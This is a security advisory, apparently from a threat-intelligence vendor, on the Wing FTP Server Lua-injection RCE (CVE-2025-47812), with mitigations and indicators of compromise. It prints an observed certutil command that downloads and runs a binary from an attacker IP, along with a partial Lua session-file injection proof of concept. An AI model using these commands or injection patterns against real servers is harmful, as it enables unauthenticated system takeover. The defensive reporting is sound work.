CVE-2025-47812: Wing FTP Server Exposed to Root-Level RCE Attacks

Wing FTP Server has been found vulnerable to a severe security flaw that is now under active exploitation. Identified as CVE-2025-47812, this Remote Code Execution (RCE) vulnerability carries a maximum severity score. With the ability to grant attackers SYSTEM/root-level access without authentication, the flaw poses a serious threat.

Wing FTP is a cross-platform file transfer server supporting FTP, FTPS, SFTP, and HTTP/S protocols. It includes a web-based admin interface for remote management, making it suitable for diverse organizational needs. Over 10,000 customers use Wing FTP, including entities like Airbus, Reuters, and the U.S. Air Force.

What Is CVE-2025-47812?

CVE-2025-47812 (CVSS 10.0) is a critical vulnerability discovered in Wing FTP Server versions prior to 7.4.4. This issue stems from improper input handling in the authentication logic, specifically within the loginok.htmlendpoint that processes login requests.

The vulnerability is a combination of a null byte injection and Lua code injection flaw, leading to Remote Code Execution (RCE).

Attackers exploit the flaw by inserting a %00 null byte into the username parameter, which prematurely terminates the string processing. This, in combination with crafted Lua code, enables adversaries to inject arbitrary commands into session files managed by the server’s Lua interpreter. When those session files are read by the application, typically during a subsequent request to any server endpoint such as dir.html, the injected code is executed with elevated privileges.

The fact that this vulnerability is exploitable across all major operating systems supported by Wing FTP (Windows, Linux, macOS) increases its potential impact.

How Attackers Exploit CVE-2025-47812

1. Entry Point: Malicious Login Requests

Exploitation begins with a POST request to loginok.html, using either known credentials or anonymous access if enabled. The attacker injects a payload in the username field, appending two closing square brackets (]]) and Lua code, followed by — to neutralize any trailing syntax errors.

This injection corrupts the session object and effectively replaces legitimate values with attacker-defined scripts. These session objects are stored in .lua files that the server routinely loads, triggering the execution of the injected payload.

2. Payload Execution via Lua

The injected payloads often include base16-encoded strings converted back into executable commands using a Lua hx() function. One decoded command retrieved and executed a malicious binary using certutil:

certutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%mvveiWJHx.exe & start /B %TEMP%mvveiWJHx.exe

This binary acted as a beacon, potentially giving remote attackers persistent control over the system. Other observed scripts aimed to download additional payloads, install remote support tools, or exfiltrate system information.

Adversary Activity and Tactics Used

During their activity, threat actors executed a series of commands designed to map the environment and gain persistence:

• Network reconnaissance via ipconfig, arp-a, and nslookup.
• Enumeration of system users and privileges using whoami, net user, and PowerShell scripts.
• Creation of new user accounts to maintain access.
• Attempts to use curl and certutil for downloading additional malware.

Interestingly, attackers showed signs of inexperience, evident from malformed commands containing non-printable characters and invalid syntax. These missteps did not stop persistent attempts, including efforts to install ScreenConnect or use PowerShell for script execution.

Proof of Concept (PoC) for CVE-2025-47812

Researchers provided a technical breakdown and Proof-of-Concept (PoC) exploit illustrating this vulnerability in action. An example .lua session file used for injection included the following Lua logic:

_SESSION[‘username’]=[[anonymous]]
local function hx(s) return (s:gsub(‘..’, function(x) return string.char(tonumber(x,16)) end)) end
local cmd = hx(“63657274…”)
local h = io.popen(cmd)
local r = h:read(“*a”)
h:close()
–]]
_SESSION[‘ipaddress’]=[[185.196.9.225]]
_SESSION[‘currentpath’]=[[/]]

The payload’s embedded command fetched a binary from a remote server, saved it to a temporary directory, and executed it. These session files are easy to overlook, yet serve as the primary execution vectors for this attack.

Understanding exactly what assets you have exposed and which vulnerabilities pose the greatest risk is key to effective cybersecurity. SOCRadar’s Attack Surface Management (ASM) continuously scans your external environment to uncover vulnerable systems, misconfigurations, and hidden digital assets.

Combined with SOCRadar’s Cyber Threat Intelligence module, including powerful Vulnerability Intelligence, you get up-to-date alerts on new CVEs, ongoing exploit activity, and relevant context. This helps your team focus on the most urgent issues and patch faster to keep attackers at bay.

How to Defend Your Wing FTP Server Against This Vulnerability

System administrators should review the following indicators:

• Abnormal Session Files: Stored under C:Program Files (x86)Wing FTP Serversession. Files with unusually large sizes or Lua logic should be flagged.
• Malformed Log Entries: Found in C:Program Files (x86)Wing FTP ServerLogDomains[domain]YYYY-M-D.log, look for truncated entries such as User ‘anonymous (missing closing quote).
• Unexpected Process Activity: Look for cmd.exe, curl, or powershellprocesses invoked under WFTPServer.exe.

Recommended Mitigations

To secure your systems:

• Patch Immediately: Upgrade to Wing FTP Server version 7.4.4 or later, where this vulnerability is resolved.
• Limit Access: Disable anonymous login unless strictly necessary.
• Audit Lua Files: Regularly inspect .lua session files and remove those containing executable logic.
• Enhance Monitoring: Use EDR tools to monitor for suspicious command execution and behavioral anomalies.
• Apply Sigma Rule & Monitor IOCs: Apply the Sigma rule provided here to identify exploitation attempts, and monitor for known Indicators of Compromise (IOCs) to detect malicious activity. The IOCs provided by the researchers are listed in the next section.

For a detailed technical analysis, including the PoC exploit and video demonstration, refer to the Huntress research blog.

Indicators of Compromise (IOCs)

Attacker IP Addresses:

• 223.160.131[.]104
• 149.248.44[.]88
• 103.88.141[.]42
• 185.196.9[.]225
• 146.70.11[.]39

Webhook Site:

• https://webhook[.]site/5d112487-6133-4942-ac87-3f473d44bd81

Backdoor usernames used by the attackers: 

• wing
• wingftp

Passwords used for attacker accounts: 

• 123123qweqwe
• 123123qweqweq

Beacon: 

• URL: http://185.196.9[.]225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%mvveiWJHx.exe
• PATH: %TEMP%mvveiWJHx.exe
• SHA256: c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4

Microsoft Defender Detection: 

• Trojan:Win32/Ceprolad.A

ScreenConnect Installer: 

• URL: https://oooooooo11.screenconnect[.]com/bin/screenconnect.clientsetup.msi
• PATH: c:1.msi
• SHA256: f0fcc638cd93bdd6fb4745d75b491395a7a1b2cb08e0153a2eb417cb2f58d8ac

ScreenConnect Callback URL:

• instance-y9tbyl-relay.screenconnect[.]com